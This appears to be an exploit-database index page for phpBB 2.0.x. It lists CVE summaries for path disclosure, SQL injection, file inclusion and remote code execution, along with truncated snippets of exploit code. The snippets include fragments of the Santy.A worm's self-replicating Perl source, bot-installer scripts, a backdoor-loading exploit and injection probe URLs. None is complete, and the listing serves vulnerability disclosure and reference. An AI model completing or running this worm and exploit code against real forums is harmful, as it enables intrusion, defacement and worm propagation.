PHPBB 2.0.12 bug

PHPBB 2.0.12 is vulnable again to a path disclosure bug.And again the bug is in viewtopic.php.I wont repeat my firs submition so here is the bug: http://localhost/forum/viewtopic.php?t=4&highlight= As you can see you just need a valid topic.Here is a nother example:...

CVE-2005-0258

Directory traversal vulnerability in 1 usercpregister.php and 2 usercpavatar.php for phpBB 2.0.11, and possibly other versions, with gallery avatars enabled, allows remote attackers to delete unlink arbitrary files via "/../" sequences in the avatarselect parameter...

phpBB < 2.0.12 Path Disclosure / Unauthorized unlink() Function Access

Binary data 2641.prm...

CVE-2004-1535

PHP remote file inclusion vulnerability in admincash.php for the Cash Mod module for phpBB allows remote attackers to execute arbitrary PHP code by modifying the phpbbrootpath parameter to reference a URL on a remote web server that contains the code...

Possible phpBB &lt;=2.0.11 bug or sql injection?

Since phpbb's website says not to post it on their forum, I guess I'll post my findings here. http://www.phpbb.com/phpBB/search.php?searchauthor='fnfnfffffa,'cdf or http://www.phpbb.com/phpBB/search.php?searchauthor= It seems it has something to do with the the 's 's and length. I am not sure if...

phpbb 2.0.11 bug

PHPBB 2.0.11 is vulnable to a path disclosure.All you need is a valid topic and for highlight put .Here is a sample: http://www.site.com/forum/viewtopic.php?t=2&highlight= Here is the messege you will get: Warning: Compilation failed: missing at offset 7 in c:appservwwwforumviewtopic.php1109 :...

phpBB 2.0.10 - &#039;ssh.D.Worm&#039; Bot Install Altavista

!/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE"; $SIG"HUP" = "IGNORE"; $SIG"TERM"...

CVE-2004-1315

viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which...

CVE-2004-1404

Attachment Mod 2.3.10 module for phpBB, when used with Apache modmime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code...

CVE-2004-2054

CRLF injection vulnerability in PhpBB 2.0.4 and 2.0.9 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via 1 the mode parameter to privmsg.php or 2 the redirect parameter to login.php...

Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)

Exploit for unknown platform in category web applications ========================================================= Sanity.b - phpBB newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n"; @resu = ; close$sock; $ae = "@resu"...

phpBB highlight Arbitrary File Upload (Santy.A)

No description provided by source. Santy.A - phpBB = 2.0.10 Web Worm Source Code Proof of Concept -SECU For educational purpose See : http://isc.sans.org/diary.php?date=2004-12-21 http://www.f-secure.com/v-descs/santya.shtml !/usr/bin/perl use strict; use Socket; sub PayLoad; sub DoDir$; sub DoFi...

phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload

phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1...

phpBB &lt; 2.0.10 - &#039;Santy.A Worm&#039; &#039;highlight&#039; Arbitrary File Upload

Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1 . ';'/e; my $selfFileName = 'm1ho2of'; my $markStr =...

phpBB viewtopic.php fails to properly sanitize input passed to the "highlight" parameter

Overview phpBB contains an user input validation problem with regard to the parsing of the URL. An intruder can deface a phpBB website, execute arbitrary commands, or gain administrative privileges on a compromised bulletin board. Description phpBB is an open-source bulletin board. A lack of inpu...

phpbbquoteflaw.txt

Affected Software: phpBB 2.x tested on 2.0.4 and 2.0.8, untested on later versions Vulnerability: flaw in code handling the quoting of posts. Severity: Low Discovered by: Matt Benenati +Details+ ========= This flaw could allow a malicious user to alter the alignment and layout of any posts in the...

phpBB 1.0.0/2.0.10 - &#039;admin_cash.php&#039; Remote Code Execution

/ exploit for phpBB 1.0.0 - 2.0.10 edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to a webserver. gcc -o b4b0-phpbb b4b0-phpbb.c ./b4b0-phpbb telnet greets to b4b0 -- evilrabbi / include include include include include include voi...

phpBB 2.0.10 - Remote Command Execution (CGI)

phpBB 2.0.10 - Remote Command Execution CGI !/usr/bin/perl wphpbb.cgi hack service: http://site/cgi-bin/wphpbb.cgi use CGI qw:standard; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $serv = $CGI-param"serv"; $dir = $CGI-param"dir"; $topic = $CGI-param"topic"; $cmd =...

phpBB 2.0.10 - Remote Command Execution (CGI)

!/usr/bin/perl wphpbb.cgi hack service: http://site/cgi-bin/wphpbb.cgi use CGI qw:standard; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $serv = $CGI-param"serv"; $dir = $CGI-param"dir"; $topic = $CGI-param"topic"; $cmd = $CGI-param"cmd"; print...

Phpbb id: 10701 update and Attachmodule add-on Directory Traversal

Phpbb: All vulnerable all except 2.0.11 Attachment module: All version vulnerable Howdark update opened wide my eyes with his nice exploit: Bugtraq id: 10701 ----- viewtopic.php?t=1&highlight=2527 ----- Looking at the code I saw that was possible inject any type of Sql query with a multiple char...